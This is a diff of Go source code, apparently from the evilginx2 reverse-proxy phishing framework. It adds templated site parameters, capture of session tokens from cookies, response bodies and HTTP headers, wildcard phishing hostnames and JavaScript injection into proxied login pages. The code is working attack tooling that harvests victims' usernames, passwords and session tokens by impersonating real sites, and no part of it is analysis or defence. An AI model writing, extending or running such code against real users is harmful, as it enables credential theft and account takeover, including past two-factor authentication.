p.bodyAuthTokens = make(map[string]*BodyAuthToken)
|
||||
p.httpAuthTokens = make(map[string]*HttpAuthToken)
|
||||
p.authUrls = []*regexp.Regexp{}
|
||||
p.username.key = nil
|
||||
p.username.search = nil
|
||||
@ -208,9 +243,11 @@ func (p *Phishlet) Clear() {
|
||||
p.password.search = nil
|
||||
p.custom = []PostField{}
|
||||
p.forcePost = []ForcePost{}
|
||||
p.customParams = make(map[string]string)
|
||||
p.isTemplate = false
|
||||
}
|
||||
|
||||
func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[string]string) error {
|
||||
p.Clear()
|
||||
|
||||
c := viper.New()
|
||||
@ -223,6 +260,8 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
}
|
||||
|
||||
p.Name = site
|
||||
p.Path = path
|
||||
p.ParentName = ""
|
||||
p.Author = c.GetString("author")
|
||||
p.Version, err = p.parseVersion(c.GetString("min_ver"))
|
||||
if err != nil {
|
||||
@ -254,12 +293,68 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
return err
|
||||
}
|
||||
|
||||
if fp.Params != nil {
|
||||
if len(*fp.Params) > 0 {
|
||||
p.isTemplate = true
|
||||
}
|
||||
if customParams != nil {
|
||||
prequired := make(map[string]string)
|
||||
pall := make(map[string]string)
|
||||
params := make(map[string]string)
|
||||
for _, param := range *fp.Params {
|
||||
val := ""
|
||||
if param.Default != nil {
|
||||
val = *param.Default
|
||||
}
|
||||
params[param.Name] = val
|
||||
pall[param.Name] = val
|
||||
|
||||
if param.Required != nil && *param.Required == true {
|
||||
prequired[param.Name] = val
|
||||
}
|
||||
}
|
||||
for k, v := range *customParams {
|
||||
if _, ok := pall[k]; !ok {
|
||||
log.Warning("phishlets: [%s] incorrect parameter key specified: %s", site, k)
|
||||
delete(*customParams, k)
|
||||
continue
|
||||
}
|
||||
params[k] = v
|
||||
if _, ok := prequired[k]; ok {
|
||||
delete(prequired, k)
|
||||
}
|
||||
}
|
||||
if len(prequired) > 0 {
|
||||
return fmt.Errorf("missing custom parameter values during initalization: %v", prequired)
|
||||
}
|
||||
p.isTemplate = false
|
||||
p.customParams = params
|
||||
} else {
|
||||
for _, param := range *fp.Params {
|
||||
val := ""
|
||||
if param.Required != nil && *param.Required {
|
||||
val += "(required)"
|
||||
} else if param.Default != nil {
|
||||
val = *param.Default
|
||||
}
|
||||
|
||||
p.customParams[param.Name] = val
|
||||
}
|
||||
}
|
||||
|
||||
/*
|
||||
if customParams != nil {
|
||||
p.customParams = *customParams
|
||||
} else {
|
||||
for _, param := range *fp.Params {
|
||||
p.customParams[param.Name] = param.Default
|
||||
}
|
||||
}*/
|
||||
}
|
||||
|
||||
if fp.ProxyHosts == nil {
|
||||
return fmt.Errorf("missing `proxy_hosts` section")
|
||||
}
|
||||
if fp.SubFilters == nil {
|
||||
return fmt.Errorf("missing `sub_filters` section")
|
||||
}
|
||||
if fp.AuthTokens == nil {
|
||||
return fmt.Errorf("missing `auth_tokens` section")
|
||||
}
|
||||
@ -290,7 +385,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if ph.AutoFilter != nil {
|
||||
auto_filter = *ph.AutoFilter
|
||||
}
|
||||
p.addProxyHost(*ph.PhishSub, *ph.OrigSub, *ph.Domain, ph.Session, ph.IsLanding, auto_filter)
|
||||
p.addProxyHost(p.paramVal(*ph.PhishSub), p.paramVal(*ph.OrigSub), p.paramVal(*ph.Domain), ph.Session, ph.IsLanding, auto_filter)
|
||||
}
|
||||
if len(p.proxyHosts) == 0 {
|
||||
return fmt.Errorf("proxy_hosts: list cannot be empty")
|
||||
@ -316,29 +411,35 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
p.proxyHosts[0].is_landing = true
|
||||
}
|
||||
|
||||
for _, sf := range *fp.SubFilters {
|
||||
if sf.Hostname == nil {
|
||||
return fmt.Errorf("sub_filters: missing `triggers_on` field")
|
||||
if fp.SubFilters != nil {
|
||||
for _, sf := range *fp.SubFilters {
|
||||
if sf.Hostname == nil {
|
||||
return fmt.Errorf("sub_filters: missing `triggers_on` field")
|
||||
}
|
||||
if sf.Sub == nil {
|
||||
return fmt.Errorf("sub_filters: missing `orig_sub` field")
|
||||
}
|
||||
if sf.Domain == nil {
|
||||
return fmt.Errorf("sub_filters: missing `domain` field")
|
||||
}
|
||||
if sf.Mimes == nil {
|
||||
return fmt.Errorf("sub_filters: missing `mimes` field")
|
||||
}
|
||||
if sf.Search == nil {
|
||||
return fmt.Errorf("sub_filters: missing `search` field")
|
||||
}
|
||||
if sf.Replace == nil {
|
||||
return fmt.Errorf("sub_filters: missing `replace` field")
|
||||
}
|
||||
if sf.WithParams == nil {
|
||||
sf.WithParams = &[]string{}
|
||||
}
|
||||
|
||||
for n := range *sf.Mimes {
|
||||
(*sf.Mimes)[n] = p.paramVal((*sf.Mimes)[n])
|
||||
}
|
||||
p.addSubFilter(p.paramVal(*sf.Hostname), p.paramVal(*sf.Sub), p.paramVal(*sf.Domain), *sf.Mimes, p.paramVal(*sf.Search), p.paramVal(*sf.Replace), sf.RedirectOnly, *sf.WithParams)
|
||||
}
|
||||
if sf.Sub == nil {
|
||||
return fmt.Errorf("sub_filters: missing `orig_sub` field")
|
||||
}
|
||||
if sf.Domain == nil {
|
||||
return fmt.Errorf("sub_filters: missing `domain` field")
|
||||
}
|
||||
if sf.Mimes == nil {
|
||||
return fmt.Errorf("sub_filters: missing `mimes` field")
|
||||
}
|
||||
if sf.Search == nil {
|
||||
return fmt.Errorf("sub_filters: missing `search` field")
|
||||
}
|
||||
if sf.Replace == nil {
|
||||
return fmt.Errorf("sub_filters: missing `replace` field")
|
||||
}
|
||||
if sf.WithParams == nil {
|
||||
sf.WithParams = &[]string{}
|
||||
}
|
||||
p.addSubFilter(*sf.Hostname, *sf.Sub, *sf.Domain, *sf.Mimes, *sf.Search, *sf.Replace, sf.RedirectOnly, *sf.WithParams)
|
||||
}
|
||||
if fp.JsInject != nil {
|
||||
for _, js := range *fp.JsInject {
|
||||
@ -351,20 +452,82 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if js.Script == nil {
|
||||
return fmt.Errorf("js_inject: missing `script` field")
|
||||
}
|
||||
err := p.addJsInject(*js.TriggerDomains, *js.TriggerPaths, js.TriggerParams, *js.Script)
|
||||
for n := range *js.TriggerDomains {
|
||||
(*js.TriggerDomains)[n] = p.paramVal((*js.TriggerDomains)[n])
|
||||
}
|
||||
for n := range *js.TriggerPaths {
|
||||
(*js.TriggerPaths)[n] = p.paramVal((*js.TriggerPaths)[n])
|
||||
}
|
||||
err := p.addJsInject(*js.TriggerDomains, *js.TriggerPaths, js.TriggerParams, p.paramVal(*js.Script))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
for _, at := range *fp.AuthTokens {
|
||||
err := p.addAuthTokens(at.Domain, at.Keys)
|
||||
if err != nil {
|
||||
return err
|
||||
ttype := "cookie"
|
||||
if at.Type != nil {
|
||||
ttype = *at.Type
|
||||
}
|
||||
if !stringExists(ttype, AUTH_TOKEN_TYPES) {
|
||||
return fmt.Errorf("auth_tokens: invalid token type: %s", ttype)
|
||||
}
|
||||
switch ttype {
|
||||
case "cookie":
|
||||
if at.Domain == nil {
|
||||
return fmt.Errorf("auth_tokens: 'domain' not found for cookie auth token")
|
||||
}
|
||||
if at.Keys == nil {
|
||||
return fmt.Errorf("auth_tokens: 'keys' not found for cookie auth token")
|
||||
}
|
||||
|
||||
for n := range *at.Keys {
|
||||
(*at.Keys)[n] = p.paramVal((*at.Keys)[n])
|
||||
}
|
||||
err := p.addCookieAuthTokens(p.paramVal(*at.Domain), *at.Keys)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
case "body":
|
||||
if at.Domain == nil {
|
||||
return fmt.Errorf("auth_tokens: 'domain' not found for body auth token")
|
||||
}
|
||||
if at.Path == nil {
|
||||
return fmt.Errorf("auth_tokens: 'path' not found for body auth token")
|
||||
}
|
||||
if at.Name == nil {
|
||||
return fmt.Errorf("auth_tokens: 'name' not found for body auth token")
|
||||
}
|
||||
if at.Search == nil {
|
||||
return fmt.Errorf("auth_tokens: 'search' not found for body auth token")
|
||||
}
|
||||
|
||||
err := p.addBodyAuthToken(p.paramVal(*at.Domain), p.paramVal(*at.Path), p.paramVal(*at.Name), p.paramVal(*at.Search))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
case "http":
|
||||
if at.Domain == nil {
|
||||
return fmt.Errorf("auth_tokens: 'domain' not found for http auth token")
|
||||
}
|
||||
if at.Path == nil {
|
||||
return fmt.Errorf("auth_tokens: 'path' not found for http auth token")
|
||||
}
|
||||
if at.Name == nil {
|
||||
return fmt.Errorf("auth_tokens: 'name' not found for http auth token")
|
||||
}
|
||||
if at.Header == nil {
|
||||
return fmt.Errorf("auth_tokens: 'header' not found for http auth token")
|
||||
}
|
||||
|
||||
err := p.addHttpAuthToken(p.paramVal(*at.Domain), p.paramVal(*at.Path), p.paramVal(*at.Name), p.paramVal(*at.Header))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
for _, au := range fp.AuthUrls {
|
||||
re, err := regexp.Compile(au)
|
||||
re, err := regexp.Compile(p.paramVal(au))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -384,22 +547,22 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
return fmt.Errorf("credentials: missing password `search` field")
|
||||
}
|
||||
|
||||
p.username.key, err = regexp.Compile(*fp.Credentials.Username.Key)
|
||||
p.username.key, err = regexp.Compile(p.paramVal(*fp.Credentials.Username.Key))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
|
||||
p.username.search, err = regexp.Compile(*fp.Credentials.Username.Search)
|
||||
p.username.search, err = regexp.Compile(p.paramVal(*fp.Credentials.Username.Search))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
|
||||
p.password.key, err = regexp.Compile(*fp.Credentials.Password.Key)
|
||||
p.password.key, err = regexp.Compile(p.paramVal(*fp.Credentials.Password.Key))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
|
||||
p.password.search, err = regexp.Compile(*fp.Credentials.Password.Search)
|
||||
p.password.search, err = regexp.Compile(p.paramVal(*fp.Credentials.Password.Search))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
@ -412,8 +575,8 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if p.password.tp == "" {
|
||||
p.password.tp = "post"
|
||||
}
|
||||
p.username.key_s = *fp.Credentials.Username.Key
|
||||
p.password.key_s = *fp.Credentials.Password.Key
|
||||
p.username.key_s = p.paramVal(*fp.Credentials.Username.Key)
|
||||
p.password.key_s = p.paramVal(*fp.Credentials.Password.Key)
|
||||
|
||||
if fp.LoginItem.Domain == nil {
|
||||
return fmt.Errorf("login: missing `domain` field")
|
||||
@ -421,7 +584,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if fp.LoginItem.Path == nil {
|
||||
return fmt.Errorf("login: missing `path` field")
|
||||
}
|
||||
p.login.domain = *fp.LoginItem.Domain
|
||||
p.login.domain = p.paramVal(*fp.LoginItem.Domain)
|
||||
if p.login.domain == "" {
|
||||
return fmt.Errorf("login: `domain` field cannot be empty")
|
||||
}
|
||||
@ -441,7 +604,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
return fmt.Errorf("login: `domain` must contain a value of one of the hostnames (`orig_subdomain` + `domain`) defined in `proxy_hosts` section")
|
||||
}
|
||||
|
||||
p.login.path = *fp.LoginItem.Path
|
||||
p.login.path = p.paramVal(*fp.LoginItem.Path)
|
||||
if p.login.path == "" {
|
||||
p.login.path = "/"
|
||||
}
|
||||
@ -459,11 +622,11 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
return fmt.Errorf("credentials: missing custom `search` field")
|
||||
}
|
||||
o := PostField{}
|
||||
o.key, err = regexp.Compile(*cp.Key)
|
||||
o.key, err = regexp.Compile(p.paramVal(*cp.Key))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
o.search, err = regexp.Compile(*cp.Search)
|
||||
o.search, err = regexp.Compile(p.paramVal(*cp.Search))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -471,7 +634,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if o.tp == "" {
|
||||
o.tp = "post"
|
||||
}
|
||||
o.key_s = *cp.Key
|
||||
o.key_s = p.paramVal(*cp.Key)
|
||||
p.custom = append(p.custom, o)
|
||||
}
|
||||
}
|
||||
@ -490,7 +653,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
}
|
||||
|
||||
fpf := ForcePost{}
|
||||
fpf.path, err = regexp.Compile(*op.Path)
|
||||
fpf.path, err = regexp.Compile(p.paramVal(*op.Path))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -506,11 +669,11 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
}
|
||||
|
||||
f_s := ForcePostSearch{}
|
||||
f_s.key, err = regexp.Compile(*op_s.Key)
|
||||
f_s.key, err = regexp.Compile(p.paramVal(*op_s.Key))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
f_s.search, err = regexp.Compile(*op_s.Search)
|
||||
f_s.search, err = regexp.Compile(p.paramVal(*op_s.Search))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -526,8 +689,8 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
}
|
||||
|
||||
f_f := ForcePostForce{
|
||||
key: *op_f.Key,
|
||||
value: *op_f.Value,
|
||||
key: p.paramVal(*op_f.Key),
|
||||
value: p.paramVal(*op_f.Value),
|
||||
}
|
||||
fpf.force = append(fpf.force, f_f)
|
||||
}
|
||||
@ -537,70 +700,34 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
|
||||
if fp.LandingPath != nil {
|
||||
p.landing_path = *fp.LandingPath
|
||||
for n := range p.landing_path {
|
||||
p.landing_path[n] = p.paramVal(p.landing_path[n])
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (p *Phishlet) GetPhishHosts() []string {
|
||||
func (p *Phishlet) GetPhishHosts(use_wildcards bool) []string {
|
||||
var ret []string
|
||||
for _, h := range p.proxyHosts {
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Site)
|
||||
if ok {
|
||||
ret = append(ret, combineHost(h.phish_subdomain, phishDomain))
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Name)
|
||||
if ok {
|
||||
if !use_wildcards {
|
||||
for _, h := range p.proxyHosts {
|
||||
ret = append(ret, combineHost(h.phish_subdomain, phishDomain))
|
||||
}
|
||||
} else {
|
||||
ret = []string{"*." + phishDomain}
|
||||
}
|
||||
}
|
||||
return ret
|
||||
}
|
||||
|
||||
func (p *Phishlet) GetLandingUrls(redirect_url string, inc_token bool) ([]string, error) {
|
||||
var ret []string
|
||||
host := p.cfg.GetBaseDomain()
|
||||
for _, h := range p.proxyHosts {
|
||||
if h.is_landing {
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Site)
|
||||
if ok {
|
||||
host = combineHost(h.phish_subdomain, phishDomain)
|
||||
}
|
||||
}
|
||||
}
|
||||
b64_param := ""
|
||||
if redirect_url != "" {
|
||||
_, err := url.ParseRequestURI(redirect_url)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
b64_param = base64.URLEncoding.EncodeToString([]byte(redirect_url))
|
||||
}
|
||||
|
||||
for _, u := range p.landing_path {
|
||||
purl := "https://" + host + u
|
||||
if inc_token {
|
||||
sep := "?"
|
||||
for n := len(u) - 1; n >= 0; n-- {
|
||||
switch u[n] {
|
||||
case '/':
|
||||
break
|
||||
case '?':
|
||||
sep = "&"
|
||||
break
|
||||
}
|
||||
}
|
||||
purl += sep + p.cfg.verificationParam + "=" + p.cfg.verificationToken
|
||||
if b64_param != "" {
|
||||
purl += "&" + p.cfg.redirectParam + "=" + url.QueryEscape(b64_param)
|
||||
}
|
||||
}
|
||||
ret = append(ret, purl)
|
||||
}
|
||||
return ret, nil
|
||||
}
|
||||
|
||||
func (p *Phishlet) GetLureUrl(path string) (string, error) {
|
||||
var ret string
|
||||
host := p.cfg.GetBaseDomain()
|
||||
for _, h := range p.proxyHosts {
|
||||
if h.is_landing {
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Site)
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Name)
|
||||
if ok {
|
||||
host = combineHost(h.phish_subdomain, phishDomain)
|
||||
}
|
||||
@ -635,7 +762,7 @@ func (p *Phishlet) GetScriptInject(hostname string, path string, params *map[str
|
||||
params_matched := false
|
||||
if params != nil {
|
||||
pcnt := 0
|
||||
for k, _ := range *params {
|
||||
for k := range *params {
|
||||
if stringExists(k, js.trigger_params) {
|
||||
pcnt += 1
|
||||
}
|
||||
@ -665,7 +792,7 @@ func (p *Phishlet) GetScriptInject(hostname string, path string, params *map[str
|
||||
func (p *Phishlet) GenerateTokenSet(tokens map[string]string) map[string]map[string]string {
|
||||
ret := make(map[string]map[string]string)
|
||||
td := make(map[string]string)
|
||||
for domain, tokens := range p.authTokens {
|
||||
for domain, tokens := range p.cookieAuthTokens {
|
||||
ret[domain] = make(map[string]string)
|
||||
for _, t := range tokens {
|
||||
td[t.name] = domain
|
||||
@ -695,23 +822,27 @@ func (p *Phishlet) addSubFilter(hostname string, subdomain string, domain string
|
||||
hostname = strings.ToLower(hostname)
|
||||
subdomain = strings.ToLower(subdomain)
|
||||
domain = strings.ToLower(domain)
|
||||
for n, _ := range mime {
|
||||
for n := range mime {
|
||||
mime[n] = strings.ToLower(mime[n])
|
||||
}
|
||||
p.subfilters[hostname] = append(p.subfilters[hostname], SubFilter{subdomain: subdomain, domain: domain, mime: mime, regexp: regexp, replace: replace, redirect_only: redirect_only, with_params: with_params})
|
||||
}
|
||||
|
||||
func (p *Phishlet) addAuthTokens(hostname string, tokens []string) error {
|
||||
p.authTokens[hostname] = []*AuthToken{}
|
||||
func (p *Phishlet) addCookieAuthTokens(hostname string, tokens []string) error {
|
||||
p.cookieAuthTokens[hostname] = []*CookieAuthToken{}
|
||||
for _, tk := range tokens {
|
||||
st := strings.Split(tk, ",")
|
||||
st := strings.Split(tk, ":")
|
||||
if len(st) == 1 {
|
||||
st = strings.Split(tk, ",")
|
||||
}
|
||||
if len(st) > 0 {
|
||||
name := st[0]
|
||||
at := &AuthToken{
|
||||
at := &CookieAuthToken{
|
||||
name: name,
|
||||
re: nil,
|
||||
http_only: false,
|
||||
optional: false,
|
||||
always: false,
|
||||
}
|
||||
for i := 1; i < len(st); i++ {
|
||||
switch st[i] {
|
||||
@ -723,21 +854,59 @@ func (p *Phishlet) addAuthTokens(hostname string, tokens []string) error {
|
||||
}
|
||||
case "opt":
|
||||
at.optional = true
|
||||
case "always":
|
||||
at.always = true
|
||||
}
|
||||
}
|
||||
p.authTokens[hostname] = append(p.authTokens[hostname], at)
|
||||
p.cookieAuthTokens[hostname] = append(p.cookieAuthTokens[hostname], at)
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (p *Phishlet) addBodyAuthToken(hostname string, path string, name string, search string) error {
|
||||
path_re, err := regexp.Compile(path)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
search_re, err := regexp.Compile(search)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
p.bodyAuthTokens[name] = &BodyAuthToken{
|
||||
domain: hostname,
|
||||
path: path_re,
|
||||
name: name,
|
||||
search: search_re,
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (p *Phishlet) addHttpAuthToken(hostname string, path string, name string, header string) error {
|
||||
path_re, err := regexp.Compile(path)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
p.httpAuthTokens[name] = &HttpAuthToken{
|
||||
domain: hostname,
|
||||
path: path_re,
|
||||
name: name,
|
||||
header: header,
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (p *Phishlet) addJsInject(trigger_domains []string, trigger_paths []string, trigger_params []string, script string) error {
|
||||
js := JsInject{}
|
||||
for _, d := range trigger_domains {
|
||||
js.trigger_domains = append(js.trigger_domains, strings.ToLower(d))
|
||||
}
|
||||
for _, d := range trigger_paths {
|
||||
re, err := regexp.Compile(d)
|
||||
re, err := regexp.Compile("^" + d + "$")
|
||||
if err == nil {
|
||||
js.trigger_paths = append(js.trigger_paths, re)
|
||||
} else {
|
||||
@ -762,8 +931,8 @@ func (p *Phishlet) domainExists(domain string) bool {
|
||||
return false
|
||||
}
|
||||
|
||||
func (p *Phishlet) getAuthToken(domain string, token string) *AuthToken {
|
||||
if tokens, ok := p.authTokens[domain]; ok {
|
||||
func (p *Phishlet) getAuthToken(domain string, token string) *CookieAuthToken {
|
||||
if tokens, ok := p.cookieAuthTokens[domain]; ok {
|
||||
for _, at := range tokens {
|
||||
if at.re != nil {
|
||||
if at.re.MatchString(token) {
|
||||
@ -831,3 +1000,13 @@ func (p *Phishlet) parseVersion(ver string) (PhishletVersion, error) {
|
||||
}
|
||||
return ret, nil
|
||||
}
|
||||
|
||||
func (p *Phishlet) paramVal(s string) string {
|
||||
var ret string = s
|
||||
if !p.isTemplate {
|
||||
for k, v := range p.customParams {
|
||||
ret = strings.ReplaceAll(ret, "{"+k+"}", v)
|
||||
}
|
||||
}
|
||||
return ret
|
||||
}
|
||||
|
@ -1,41 +1,53 @@
|
||||
package core
|
||||
|
||||
import (
|
||||
"time"
|
||||
|
||||
"github.com/kgretzky/evilginx2/database"
|
||||
)
|
||||
|
||||
type Session struct {
|
||||
Id string
|
||||
Name string
|
||||
Username string
|
||||
Password string
|
||||
Custom map[string]string
|
||||
Params map[string]string
|
||||
Tokens map[string]map[string]*database.Token
|
||||
RedirectURL string
|
||||
IsDone bool
|
||||
IsAuthUrl bool
|
||||
IsForwarded bool
|
||||
RedirectCount int
|
||||
PhishLure *Lure
|
||||
Id string
|
||||
Name string
|
||||
Username string
|
||||
Password string
|
||||
Custom map[string]string
|
||||
Params map[string]string
|
||||
BodyTokens map[string]string
|
||||
HttpTokens map[string]string
|
||||
CookieTokens map[string]map[string]*database.CookieToken
|
||||
RedirectURL string
|
||||
IsDone bool
|
||||
IsAuthUrl bool
|
||||
IsForwarded bool
|
||||
ProgressIndex int
|
||||
RedirectCount int
|
||||
PhishLure *Lure
|
||||
RedirectorName string
|
||||
LureDirPath string
|
||||
}
|
||||
|
||||
func NewSession(name string) (*Session, error) {
|
||||
s := &Session{
|
||||
Id: GenRandomToken(),
|
||||
Name: name,
|
||||
Username: "",
|
||||
Password: "",
|
||||
Custom: make(map[string]string),
|
||||
Params: make(map[string]string),
|
||||
RedirectURL: "",
|
||||
IsDone: false,
|
||||
IsAuthUrl: false,
|
||||
IsForwarded: false,
|
||||
RedirectCount: 0,
|
||||
PhishLure: nil,
|
||||
Id: GenRandomToken(),
|
||||
Name: name,
|
||||
Username: "",
|
||||
Password: "",
|
||||
Custom: make(map[string]string),
|
||||
Params: make(map[string]string),
|
||||
BodyTokens: make(map[string]string),
|
||||
HttpTokens: make(map[string]string),
|
||||
RedirectURL: "",
|
||||
IsDone: false,
|
||||
IsAuthUrl: false,
|
||||
IsForwarded: false,
|
||||
ProgressIndex: 0,
|
||||
RedirectCount: 0,
|
||||
PhishLure: nil,
|
||||
RedirectorName: "",
|
||||
LureDirPath: "",
|
||||
}
|
||||
s.Tokens = make(map[string]map[string]*database.Token)
|
||||
s.CookieTokens = make(map[string]map[string]*database.CookieToken)
|
||||
|
||||
return s, nil
|
||||
}
|
||||
@ -52,26 +64,30 @@ func (s *Session) SetCustom(name string, value string) {
|
||||
s.Custom[name] = value
|
||||
}
|
||||
|
||||
func (s *Session) AddAuthToken(domain string, key string, value string, path string, http_only bool, authTokens map[string][]*AuthToken) bool {
|
||||
if _, ok := s.Tokens[domain]; !ok {
|
||||
s.Tokens[domain] = make(map[string]*database.Token)
|
||||
func (s *Session) AddCookieAuthToken(domain string, key string, value string, path string, http_only bool, expires time.Time) {
|
||||
if _, ok := s.CookieTokens[domain]; !ok {
|
||||
s.CookieTokens[domain] = make(map[string]*database.CookieToken)
|
||||
}
|
||||
if tk, ok := s.Tokens[domain][key]; ok {
|
||||
|
||||
if tk, ok := s.CookieTokens[domain][key]; ok {
|
||||
tk.Name = key
|
||||
tk.Value = value
|
||||
tk.Path = path
|
||||
tk.HttpOnly = http_only
|
||||
} else {
|
||||
s.Tokens[domain][key] = &database.Token{
|
||||
s.CookieTokens[domain][key] = &database.CookieToken{
|
||||
Name: key,
|
||||
Value: value,
|
||||
HttpOnly: http_only,
|
||||
}
|
||||
}
|
||||
|
||||
tcopy := make(map[string][]AuthToken)
|
||||
}
|
||||
|
||||
func (s *Session) AllCookieAuthTokensCaptured(authTokens map[string][]*CookieAuthToken) bool {
|
||||
tcopy := make(map[string][]CookieAuthToken)
|
||||
for k, v := range authTokens {
|
||||
tcopy[k] = []AuthToken{}
|
||||
tcopy[k] = []CookieAuthToken{}
|
||||
for _, at := range v {
|
||||
if !at.optional {
|
||||
tcopy[k] = append(tcopy[k], *at)
|
||||
@ -79,8 +95,8 @@ func (s *Session) AddAuthToken(domain string, key string, value string, path str
|
||||
}
|
||||
}
|
||||
|
||||
for domain, tokens := range s.Tokens {
|
||||
for tk, _ := range tokens {
|
||||
for domain, tokens := range s.CookieTokens {
|
||||
for tk := range tokens {
|
||||
if al, ok := tcopy[domain]; ok {
|
||||
for an, at := range al {
|
||||
match := false
|
||||
|
@ -1,5 +1,7 @@
|
||||
package core
|
||||
|
||||
import "strings"
|
||||
|
||||
func combineHost(sub string, domain string) string {
|
||||
if sub == "" {
|
||||
return domain
|
||||
@ -7,6 +9,14 @@ func combineHost(sub string, domain string) string {
|
||||
return sub + "." + domain
|
||||
}
|
||||
|
||||
func obfuscateDots(s string) string {
|
||||
return strings.Replace(s, ".", "[[d0t]]", -1)
|
||||
}
|
||||
|
||||
func removeObfuscatedDots(s string) string {
|
||||
return strings.Replace(s, "[[d0t]]", ".", -1)
|
||||
}
|
||||
|
||||
func stringExists(s string, sa []string) bool {
|
||||
for _, k := range sa {
|
||||
if s == k {
|
||||
|
@ -148,7 +148,7 @@ func AsRows(keys []string, vals []string) string {
|
||||
clr := color.New(color.FgHiBlack)
|
||||
mLen := maxLen(keys)
|
||||
var table string
|
||||
for i, _ := range keys {
|
||||
for i := range keys {
|
||||
table += clr.Sprintf(" %s : ", padded(keys[i], mLen, AlignLeft)) + fmt.Sprintf("%s\n", vals[i])
|
||||
}
|
||||
return table
|
||||
@ -157,7 +157,7 @@ func AsRows(keys []string, vals []string) string {
|
||||
func AsDescription(keys []string, vals []string) string {
|
||||
clr := color.New(color.FgHiBlack)
|
||||
var table string
|
||||
for i, _ := range keys {
|
||||
for i := range keys {
|
||||
table += clr.Sprintf(" %s", keys[i]) + fmt.Sprintf("\n %s\n", vals[i])
|
||||
}
|
||||
return table
|
||||
|
446
core/terminal.go
446
core/terminal.go
@ -14,6 +14,7 @@ import (
|
||||
"os"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"sort"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
@ -54,16 +55,7 @@ func NewTerminal(p *HttpProxy, cfg *Config, crt_db *CertDb, db *database.Databas
|
||||
|
||||
t.createHelp()
|
||||
t.completer = t.hlp.GetPrefixCompleter(LAYER_TOP)
|
||||
/*
|
||||
t.completer = readline.NewPrefixCompleter(
|
||||
readline.PcItem("server"),
|
||||
readline.PcItem("ip"),
|
||||
readline.PcItem("status"),
|
||||
readline.PcItem("phishlet", readline.PcItem("show"), readline.PcItem("enable"), readline.PcItem("disable"), readline.PcItem("hostname"), readline.PcItem("url")),
|
||||
readline.PcItem("sessions", readline.PcItem("delete", readline.PcItem("all"))),
|
||||
readline.PcItem("exit"),
|
||||
)
|
||||
*/
|
||||
|
||||
t.rl, err = readline.NewEx(&readline.Config{
|
||||
Prompt: DEFAULT_PROMPT,
|
||||
AutoComplete: t.completer,
|
||||
@ -93,8 +85,7 @@ func (t *Terminal) DoWork() {
|
||||
log.SetReadline(t.rl)
|
||||
|
||||
t.cfg.refreshActiveHostnames()
|
||||
t.updatePhishletCertificates("")
|
||||
t.updateLuresCertificates()
|
||||
t.manageCertificates(true)
|
||||
|
||||
t.output("%s", t.sprintPhishletStatus(""))
|
||||
|
||||
@ -161,6 +152,9 @@ func (t *Terminal) DoWork() {
|
||||
if err != nil {
|
||||
log.Error("blacklist: %v", err)
|
||||
}
|
||||
case "test-certs":
|
||||
cmd_ok = true
|
||||
t.manageCertificates(true)
|
||||
case "help":
|
||||
cmd_ok = true
|
||||
if len(args) == 2 {
|
||||
@ -187,8 +181,8 @@ func (t *Terminal) DoWork() {
|
||||
func (t *Terminal) handleConfig(args []string) error {
|
||||
pn := len(args)
|
||||
if pn == 0 {
|
||||
keys := []string{"domain", "ip", "redirect_key", "verification_key", "verification_token", "redirect_url"}
|
||||
vals := []string{t.cfg.baseDomain, t.cfg.serverIP, t.cfg.redirectParam, t.cfg.verificationParam, t.cfg.verificationToken, t.cfg.redirectUrl}
|
||||
keys := []string{"domain", "ipv4", "https_port", "dns_port", "redirect_url"}
|
||||
